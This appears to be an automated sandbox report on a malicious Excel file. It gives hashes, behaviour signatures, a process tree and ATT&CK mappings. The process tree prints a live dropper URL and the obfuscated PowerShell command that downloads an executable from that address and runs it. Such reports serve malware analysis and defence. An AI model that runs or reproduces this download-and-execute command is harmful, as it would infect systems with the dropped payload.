Analysis

  • max time kernel
    121s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    15-10-2021 17:41

General

  • Target

    171ee99567663e68f16fc3e7d7052eacfcd87d6ac9b4f3b32a69e5aca4b583b9.xls

  • Size

    384KB

  • MD5

    84cab514832f4ebf26b96fdaeb24b4fc

  • SHA1

    06963848a2ba5fb76131b55926efed986bd28294

  • SHA256

    171ee99567663e68f16fc3e7d7052eacfcd87d6ac9b4f3b32a69e5aca4b583b9

  • SHA512

    c244df05c39b9ea79f70f440b944845d12b2e2f13b3e62a47d647e1c86b8612693b9485af05bfd4ddffa53d55e87ff620731321ee27f8667c1b625e86fc47842

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://18.195.143.183/8/8/ENP_5080010136520.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\171ee99567663e68f16fc3e7d7052eacfcd87d6ac9b4f3b32a69e5aca4b583b9.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Public\Documents\himselfdespite.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://18.195.143.183/8/8/ENP_5080010136520.e`xe -Destination C:\Users\Public\Documents\humandespite.e`xe;C:\Users\Public\Documents\humandespite.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:968

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\himselfdespite.cmd
    MD5

    b405d0a155b0f30125dac9c89b41ddc5

    SHA1

    d9d01027acd3ed1538b17494354bbc803a266703

    SHA256

    42c8a5b1d4ceb090f9ba8f4430be234056294e1e8b12ce4fdb36d7a3aa00e2ed

    SHA512

    fc7e459383f76f5d8491a17e44f56ff9217c28025b020816b9d54d1b8798e068adb77a32b4f42fb6380457a167eb139d974d43e9eded5e37bf670bd68e0fbe29

  • memory/968-58-0x0000000000000000-mapping.dmp
  • memory/968-59-0x0000000075821000-0x0000000075823000-memory.dmp
    Filesize

    8KB

  • memory/968-61-0x00000000002C1000-0x00000000002C2000-memory.dmp
    Filesize

    4KB

  • memory/968-60-0x00000000002C0000-0x00000000002C1000-memory.dmp
    Filesize

    4KB

  • memory/968-62-0x00000000002C2000-0x00000000002C4000-memory.dmp
    Filesize

    8KB

  • memory/1112-56-0x0000000000000000-mapping.dmp
  • memory/1768-53-0x000000002F441000-0x000000002F444000-memory.dmp
    Filesize

    12KB

  • memory/1768-54-0x0000000071731000-0x0000000071733000-memory.dmp
    Filesize

    8KB

  • memory/1768-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB